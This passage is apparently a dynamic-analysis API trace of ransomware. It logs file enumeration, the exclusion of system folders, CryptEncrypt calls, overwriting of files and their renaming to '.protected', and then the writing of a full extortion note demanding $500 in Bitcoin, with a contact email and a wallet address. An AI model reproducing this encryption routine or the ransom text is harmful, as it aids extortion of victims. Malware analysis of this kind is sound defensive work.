"c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.protected")) returned 1 [0068.726] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Windows") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="System Volume Information") returned 1 [0068.726] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrIW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.726] lstrcmpW (lpString1="WWINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.726] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.726] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.726] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.733] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.734] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.735] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.735] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.742] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.742] CloseHandle (hObject=0xd8) returned 1 [0068.743] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected") returned 81 [0068.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.protected")) returned 1 [0068.744] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Windows") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.744] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.744] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.744] lstrcmpW (lpString1="XLINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.744] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.745] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.746] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.746] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.747] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.747] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.750] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.751] CloseHandle (hObject=0xd8) returned 1 [0068.751] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected") returned 82 [0068.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.protected")) returned 1 [0068.752] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Windows") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="System Volume Information") returned 1 [0068.752] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.752] StrStrIW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.752] lstrcmpW (lpString1="XLINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.752] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.753] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.753] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.756] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.756] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.758] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.758] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.765] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.765] CloseHandle (hObject=0xd8) returned 1 [0068.765] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected") returned 83 [0068.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.protected")) returned 1 [0068.766] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Windows") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.766] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.766] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.766] lstrcmpW (lpString1="XLSLICER.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.766] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.766] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.767] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.767] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.767] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.767] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.767] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.780] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.780] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.789] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.789] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.789] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.789] CloseHandle (hObject=0xd8) returned 1 [0068.790] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected") returned 82 [0068.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.protected")) returned 1 [0068.791] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0068.791] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0068.791] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 69 [0068.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0068.791] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0068.791] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0068.792] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0068.792] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0068.792] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0068.792] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0068.792] CloseHandle (hObject=0xd4) returned 1 [0068.792] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Windows") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Program Files") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Program Files (x86)") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="$Recycle.bin") returned 1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="System Volume Information") returned -1 [0068.792] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082") returned 51 [0068.792] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0068.792] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0068.792] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 53 [0068.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0068.802] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\.") returned 53 [0068.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.802] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.803] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.803] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.803] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\..") returned 54 [0068.803] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.803] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.804] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Windows") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.804] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.804] lstrcmpW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.804] CreateFileW 